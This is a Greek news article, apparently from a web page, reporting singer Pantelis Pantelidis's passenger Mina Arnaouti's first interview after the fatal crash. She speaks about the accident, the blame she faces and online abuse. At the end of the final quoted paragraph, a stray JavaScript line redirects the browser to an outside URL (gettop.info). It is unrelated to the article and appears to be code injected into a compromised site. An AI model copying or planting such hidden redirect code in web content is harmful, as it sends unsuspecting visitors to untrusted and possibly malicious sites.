Το ξέσπασμα της Μίνας Αρναούτη – Η πρώτη συνέντευξη μετά το τροχαίο δυστύχημα

0
30

 

Με μία χειμαρρώδη συνέντευξή της στην εφημερίδα «Πρώτο Θέμα» η Μίνα Αρναούτη ξέσπασε πρώτη φορά μετά το τροχαίο δυστύχημα που κόστισε τη ζωή του Παντελή Παντελίδη ενώ άφησε την ίδια και τη συνεπιβάτιδά τους Φρόσω Κυριάκου με πολλά τραύματα.

Οκτώ μήνες μετά κι αφού πλέον μετακόμισε μόνιμα στον τόπο καταγωγής της, τη Μυτιλήνη, η Μίνα Αρναούτη μίλησε για τη στιγμή του τροχαίου, για τα υβριστικά σχόλια, για τις κατηγορίες που δέχεται αλλά και για τον αγώνα που καταβάλλει να αποθεραπευθεί και να επανέλθει στη φυσιολογική της ζωή.

Καποια αποσπάσματα από τη συνέντευξη:

Για το δυστύχημα: «Πριν από το τροχαίο είχαμε βγει έξω να διασκεδάσουμε. Το κακό όμως έγινε. Εγώ είχα τις αισθήσεις μου μετά το συμβάν, αλλά θυμάμαι αμυδρά τις εικόνες. Εκείνη την ώρα ήμουν τόσο παγωμένη που δεν ένιωθα καθόλου πόνο. Δεν είχα καταλάβει καν πού είχα τραυματιστεί. Θυμάμαι τους διασώστες και τους πυροσβέστες που έρχονταν από πάνω μου και τους ρωτούσα συνέχεια, με όση δύναμη είχα στη φωνή αν είναι καλά ο Παντελής, αν έπαθε τίποτα και μάλιστα αυτό το έχουν καταθέσει και οι ίδιοι».

Για τα όσα λένε για την ίδια:
«Το καταλαβαίνω ότι έχασαν το παιδί τους, τον αδερφό τους, αλλά κι εγώ μια ζωή θα περνάω πολλά. Κανείς μας δεν προκάλεσε το τροχαίο, κανείς μας δεν ήθελε να συμβεί αυτό που μας σημάδεψε όλους για πάντα. Η υπόθεση είναι φως φανάρι. Έγινε αυτό που όλοι γνωρίζουμε… Εγώ δεν νιώθω θυμό, εδικά για τον Παντελή, ήμασταν φίλοι και αυτό δεν αλλάζει. Πονάω και εγώ μέσα μου για τον άδικο χαμό του».

Για τα σχόλια στα social media:
«Δεν αντέχω να με βρίζουν στο διαδίκτυο και να αφήνουν υπονοούμενα. Δεν είμαι ο άνθρωπος που κάποιοι θέλουν να παρουσιάσουν για τους δικούς τους σκοπούς. Είμαι μια νέα κοπέλα που σπούδασα δημοσιογραφία και προσπάθησα να εργαστώ πάνω σε αυτό το κομμάτι. Αυτό που με νοιάζει περισσότερο δεν είναι η αποζημίωση, όπως κάποιοι λένε, είναι η ζωή μου και το μέλλον μου. Είναι η νέα κατάσταση που πρέπει να αντιμετωπίσουμε εγώ και η μητέρα μου. Αυτό πρέπει να το καταλάβουν όλοι.

Έλεος, φτάνει πια! Είναι πάρα πολλά τα χτυπήματα που δέχομαι από τον κόσμο και δεν μπορώ να καταλάβω το γιατί… Γιατί τόσα άσχημα χτυπήματα στο Facebook, στο Instagram, παντού. Με κάνουν να νιώθω ενοχές που κατάφερα να κρατηθώ στη ζωή. Σαν να μου λένε «γιατί εσύ και όχι ο Παντελίδης». Όποιος πάει να γράψει κάτι καλό για μένα στο Facebook, αμέσως βρίζουν και αυτόν και εμένα μαζί. Με αποκαλούν βίζιτα και πουτ@@@α, χωρίς να γνωρίζουν τον Γολγοθά που πέρασα και συνεχίζω να περνάω…

Και στο κάτω-κάτω της γραφής, πιο πολύ έχω σεβαστεί εγώ και η Φρόσω τη μνήμη του Παντελίδη που δεν μιλάμε, παρά όλοι αυτοί με αυτά που κάθονται και γράφουν και ουσιαστικά βρίζουν στο Facebook». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here